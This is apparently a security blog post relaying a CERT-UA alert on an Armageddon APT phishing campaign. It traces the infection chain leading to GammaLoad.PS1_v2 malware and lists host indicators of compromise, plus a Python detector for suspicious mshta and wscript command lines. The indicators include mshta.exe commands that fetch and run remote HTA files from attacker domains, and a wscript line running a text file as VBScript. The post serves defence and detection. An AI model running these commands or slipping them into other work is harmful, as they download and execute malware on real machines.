Ukraine CERT-UA Reports a phishing campaign conducted by Armageddon APT

The Government Computer Emergency Response Team of Ukraine (CERT-UA) received reports of e-mails with the subject "On revenge in Kherson!" carrying an attachment named "Plan Kherson.htm".
When opened, the HTM file decodes and writes a "Herson.rar" file to the victim's computer; the archive contains a shortcut file named "Plan of approach and planting explosives at critical infrastructure facilities in Kherson.lnk".
If the LNK file is opened, it downloads and runs the HTA file "precarious.xml", which in turn creates and executes the files "desktop.txt" and "user.txt".
As a result, the malicious program GammaLoad.PS1_v2 is downloaded to the computer; this version implements a mechanism that takes a screenshot and sends it to the command-and-control server. CERT-UA attributes the activity to the group UAC-0010 (Armageddon).
The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.

Host:

%WINDIR%\System32\mshta.exe http://a0671524.xsph.ru/bandage/precarious.xml /f
%WINDIR%\System32\mshta.exe http://a0667987.xsph.ru/preparations/rejection.xml /f
cmd.exe /c wscript.exe %USERPROFILE%\desktop.txt //b //e:VBScript
%USERPROFILE%\desktop.txt
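As an added example (not part of the CERT-UA alert or of this post), the following Python snippet checks process command lines for the two host-level patterns listed above: mshta.exe fetching an HTA from a remote URL, and wscript.exe forced with the //e: switch to run a file whose extension is not a script type (here desktop.txt) as VBScript. The sample command lines are constructed: the first two mirror the Host indicators, the other two are invented benign activity.

```python
import ntpath
import re
from typing import List

# Constructed sample process command lines: the first two mirror the Host
# indicators from the CERT-UA alert, the last two are invented benign activity.
SAMPLE_CMDLINES = [
    r"%WINDIR%\System32\mshta.exe http://a0671524.xsph.ru/bandage/precarious.xml /f",
    r"cmd.exe /c wscript.exe %USERPROFILE%\desktop.txt //b //e:VBScript",
    r"mshta.exe C:\Program Files\Vendor\setup.hta",
    r"wscript.exe C:\Scripts\logon.vbs",
]

# mshta.exe given an http(s) URL as its first argument (remote HTA execution)
MSHTA_REMOTE = re.compile(r'mshta(?:\.exe)?\s+"?https?://', re.IGNORECASE)
# wscript.exe / cscript.exe invocation; its arguments are inspected separately
WSH_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b", re.IGNORECASE)
# Extensions the Windows Script Host runs without an engine override
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}


def analyze(cmdline: str) -> List[str]:
    """Return the names of the suspicious patterns found in one command line."""
    hits = []
    if MSHTA_REMOTE.search(cmdline):
        hits.append("mshta_remote_hta")
    m = WSH_HOST.search(cmdline)
    if m:
        args = cmdline[m.end():].split()
        # WSH switches start with "//"; the first other token is the script path
        switches = [a.lower() for a in args if a.startswith("//")]
        script = next((a.strip('"') for a in args if not a.startswith("//")), "")
        engine_override = any(s.startswith("//e:") for s in switches)
        ext = ntpath.splitext(script)[1].lower()
        # desktop.txt run as VBScript: engine forced and extension is not a script type
        if engine_override and ext not in SCRIPT_EXTS:
            hits.append("wsh_engine_override_nonscript_ext")
    return hits


def scan(cmdlines: List[str]) -> dict:
    """Map each flagged command line to the list of patterns it matched."""
    return {c: h for c in cmdlines if (h := analyze(c))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(", ".join(hits), "<-", cmd)
```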

Source: https://cert.gov.ua/article/40240

BalaGanesh
Balaganesh is an Incident Responder, Certified Ethical Hacker, Penetration Tester, Security blogger, and Founder & Author of Soc Investigation.